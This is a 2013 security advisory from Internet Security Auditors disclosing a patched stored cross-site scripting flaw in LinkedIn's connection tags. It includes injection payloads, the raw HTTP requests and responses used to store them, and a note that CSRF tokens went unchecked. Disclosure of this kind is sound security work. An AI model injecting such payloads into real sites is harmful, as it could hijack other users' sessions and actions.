Pasar al contenido principal

2013-005: LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability

2013-005: LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability

Original release date: 3rd March 2013
Last revised:
10th March 2013
Discovered by: Eduardo García Melia
Severity:
5.2/10 (CVSS Base Scored)

BACKGROUND

LinkedIn is a social networking service and website(http://www.linkedin.com/) operates the world's largest professional network on the Internet with more than 187 million members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

DESCRIPTION

LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability. The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. The affected resource is http://www.linkedin.com/people/connections when you create new tags.

VIDEO DEMO

PROOF OF CONCEPT

=========================
First Option
=========================
You can go to LinkedIn Contacts -> Connections -> Manage. After, on the
"Add New Tag" field, you can put these tags, for example:

    + <IFRAME SRC=# onmouseover="alert('XSS')">
    + <IMG SRC=# onmouseover="alert('XSS')">
    + <IMG onmouseover="alert('XSS')">

Finally, you should pulse "Add New Tag" button, and then show you the injection.

=========================
Second Option
=========================
You can go to LinkedIn Contacts -> Connections -> All Connections and then select one contact.

After, on the right panel, you have a "Tags:" label, and you should pulse "Edit tags". Then you can put this tags, for example:

    + <IFRAME SRC=# onmouseover="alert('XSS')">
    + <IMG onmouseover="alert('XSS')">

Finally, you should pulse "+" button, and then show you the injection.

=========================
REQUESTS
=========================
First, create <IFRAME SRC=# onmouseover="alert('XSS')">  Tag:

REQUEST 1:

    POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1
    Host: www.linkedin.com
    Origin: http://www.linkedin.com
    X-Requested-With: XMLHttpRequest
    X-IsAJAXForm: 1
    Cookie: XXXX
   
   
&tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert('XSS')%22%3E

RESPONSE 1:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Content-Language: en-US
    Date: Sun, 03 Mar 2013 16:49:14 GMT
    X-FS-TXN-ID: 2b654458ea50
    X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000
    X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==
    Age: 1
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0

    {"content":"113275897","status":"ok"}

Second, make request for show you the tags name's:

    REQUEST 2:
    POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1
    Host: www.linkedin.com
    Origin: http://www.linkedin.com
    X-Requested-With: XMLHttpRequest
    User-Agent: MSIE 9.0
    X-IsAJAXForm: 1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Accept: */*
    Referer: http://www.linkedin.com/people/connections
    Cookie: XXX

    &tagContext=conn_detail_panel&memIds=M-220814631
   
Or without the csrfToken, because not verify that the csrfToken value matches with cookie session token.

RESPONSE:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Date: Sun, 03 Mar 2013 16:50:37 GMT
    X-FS-TXN-ID: 2b8fc977b850
    X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000
    X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==
    Age: 0
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0

   
{"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME
SRC=# onmouseover=

\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\

\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id

\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",

\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\\\":\\\"tagsAllHave\\

\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group
members\\\",\\\"bucket\\\":\\

\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"partners\\\",\\\"bucket\\

\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}

BUSINESS IMPACT

If a malicious user will find a way to exploit this vulnerability could make other users are perform actions that he wanted in the application, since add them to your network, to erase the profile, because the csrf token is useless, since based on the user's session.

SYSTEMS AFFECTED

The vulnerability affects the LinkedIn network:

SOLUTION

Linkedin applied a new contact management system.

REVISION HISTORY

March 03, 2013: Initial release

DISCLOSURE TIMELINE

  • March 03, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • March 10, 2013: Send to Sec Team.
  • July 4, 2013: Initial vendor notification sent.
  • July 9, 2013: Vendor implemented a fix.
  • November 11, 2013: Disclosure.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.